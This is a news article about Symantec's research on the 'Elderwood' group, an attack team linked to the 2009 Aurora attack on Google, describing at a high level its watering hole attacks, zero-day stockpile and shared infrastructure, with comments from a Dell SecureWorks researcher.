UPDATE–The same team that attacked Google in the Aurora campaign in 2009 is still active and has been conducting a long-term campaign targeting defense contractors, financial services companies, energy companies, human rights organizations and government agencies using a seemingly inexhaustible supply of zero day vulnerabilities. The crew is using a variety of techniques to go after its targets, most notably compromising legitimate Web sites frequented by employees of the targeted organizations and then delivering exploits for one or more of their stockpiled zero-day bugs, researchers say.
The team behind these operations appears to be in the top tier of professional attack teams, possessing the ability to do original research to find new vulnerabilities in popular applications such as Adobe Flash and Internet Explorer, and then write exploits for those flaws, as well. Researchers at Symantec have been tracking the group, which they’ve dubbed the Elderwood gang, for some time, and have seen the crew using previously unknown vulnerabilities in rapid succession over the course of the last couple of years in attacks aimed at defense contractors, government agencies and other high-value targets.
The number of groups doing their own research and finding zero days and then writing exploits for them is virtually impossible to know, given the structure of the cybercrime underground, but it is thought to be a small number relative to the overall population of attackers. That kind of research takes time, money and high-level technical skills that many groups solely interested in stealing money just don’t have.
“In order to discover these vulnerabilities, a large undertaking would be required by the attackers to thoroughly reverse-engineer the compiled applications. This effort would be substantially reduced if they had access to source code. The vulnerabilities are used as needed, often within close succession of each other if exposure of any of the vulnerabilities is imminent,” Gavin O’Gorman and Geoff McDonald of Symantec wrote in a detailed analysis of the Elderwood crew’s tactics.
“The scale of the attacks, in terms of the number of victims and the duration of the attacks, are another indication of the resources available to the attackers. Victims are attacked, not for petty crime or theft, but for the wholesale gathering of intelligence and intellectual property. The resources required to identify and acquire useful information—let alone analyze that information—could only be provided by a large criminal organization, attackers supported by a nation state, or a nation state itself.”
The researchers said that this group is utilizing one technique, which they call a “watering hole” attack, that involves waiting for the targets to come to them rather than going after the targeted organizations or employees directly. To accomplish this, the Elderwood gang identifies a Web site that’s frequented by employees of organizations in the sector that they’re targeting, say financial services. They then compromise that site, whether through SQL injection or some other common technique, and plant exploit code on some of the public pages of the site. They then wait for the targeted employees to hit the pages, at which point the exploit fires and ideally (for the attackers) compromises the victim’s machine.
The idea is roughly the same as a typical drive-by download attack that uses SQL injection as its initial vector to compromise a site, but in this case the attacker is going after a specific site rather than a large volume of vulnerable sites and is looking for a specific subset of victims, as well. Researchers at RSA Security also analyzed attacks of this kind in July, and found that the attackers were installing a variant of Gh0stRAT, a well-known remote-access tool that’s been used in targeted attacks by Chinese groups for several years.
Joe Stewart, director of malware research at Dell SecureWorks, has been following a series of attacks by groups loosely connected to the crew that Symantec is identifying as the Elderwood gang and said that there’s no question about the group’s capabilities.
“They’re definitely doing their own research, or paying someone for immediate access to it. They certainly have plenty of zero days they’ve come out with,” Stewart said.
This Elderwood group has used a number of zero days in the last couple of years as part of its attack campaigns, including the CVE-2012-1535 Flash vulnerability that Adobe patched last month and the CVE-2012-1875 MSXML flaw in Internet Explorer that Microsoft fixed in June. The group will use exploits for these vulnerabilities both in Web-based attacks and in targeted spear-phishing email attacks. But in both cases, the goal is the theft of intellectual property.
“Although watering hole attacks have been known about since approximately March of 2011, the activity outlined in this report marks a substantial increase. Three zero-day exploits, CVE-2012-0779, CVE-2012-1875, and CVE-2012-1889 have all been used within a 30-day period to serve up back door Trojans from compromised websites,” the paper says.
The connection to the attack on Google in late 2009, which was named Aurora at the time, comes both from some commonalities in the way that the attackers are obfuscating parts of their code, which also was seen in the Hydraq Trojan, the piece of malware used in the Google attack.
“We believe the Hydraq attack and the recent attacks that exploit the vulnerabilities outlined above are linked,” O’Gorman and McDonald wrote.
“Additional links joining the various exploits together included a shared command-and-control infrastructure. Trojans dropped by different exploits were connecting to the same servers to retrieve commands from the attackers. Some compromised websites used in the watering hole attacks had two different exploits injected into them one after the other. Yet another connection is the use of similar encryption in documents and malicious executables. A technique used to pass data to a SWF file was re-used in multiple attacks. Finally, the same family of Trojan was dropped from multiple different exploits,” the researchers said.
The Elderwood team may have a custom platform set up to help take exploit code for a new vulnerability, drop it into a benign Word document or PDF and then bundle it with the Trojan payload to have the components for a new attack at hand as quickly as possible. The crew also has created a SWF file that is used in multiple attacks, with small changes, to help place their exploit code in the optimal part of memory.
“Instead of developing code to perform these tasks for each different exploit, the attackers have developed a common SWF file that is used solely to create the correct conditions in memory and accepts a parameter specifying where to download the Trojan. In some attacks, the parameter name was “Elderwood.” The same SWF file was seen used when exploiting 3 different vulnerabilities (CVE-2012-0779, CVE-2012-1875, CVE-2012-1889). By using a common SWF file, the attackers can simply deploy a new trigger, that is, a zero-day exploit, and the SWF handles the rest of the work, retrieving and decoding the back door Trojan,” the researchers said.
The Elderwood team also seems to have an uncanny ability to sense when one of the zero days it has been using is about to be disclosed publicly. It often will shift to using a new vulnerability shortly before one of its current favorites is exposed, suggesting the crew watches the developments in the underground and legitimate security communities closely.
“The group seemingly has an unlimited supply of zero-day vulnerabilities. The vulnerabilities are used as needed, often within close succession of each other if exposure of the currently used vulnerability is imminent,” Symantec’s report says.
Stewart of Dell SecureWorks said that he hasn’t seen the groups he follows droppng a specific exploit because a vulnerability is about to be patched. But he said the Elderwood gang likely is part of one of the two main attack groups based in China, with this one centered in Beijing and another based around Shanghai.
“They’re one of the two main actor groups we see and we base that assessment on the sharing of infrastructure and where it’s located and some other details,” he said. “The reason they use so many different types of malware is that they probably have people inside the groups that have certain preferences, things they like and they’re comfortable with. They use Gh0st, Hydraq, whatever they need. They have a lot of malware. It speaks to a large number of actors. They’re all getting marching orders from the same place, but it’s not the exact same people hitting the keys.”
This larger group of attackers has been active for years, well before the attack on Google became public in early 2010.
“They were active well before [the Google attack]. I have samples from them from the 2006 to 2007 time frame and some that are similar and probably them as far back as 2003,” Stewart said.
“This is years of constant, dedicated, persistent attacks.”
This story was updated on Sept. 7 to add comments from Joe Stewart.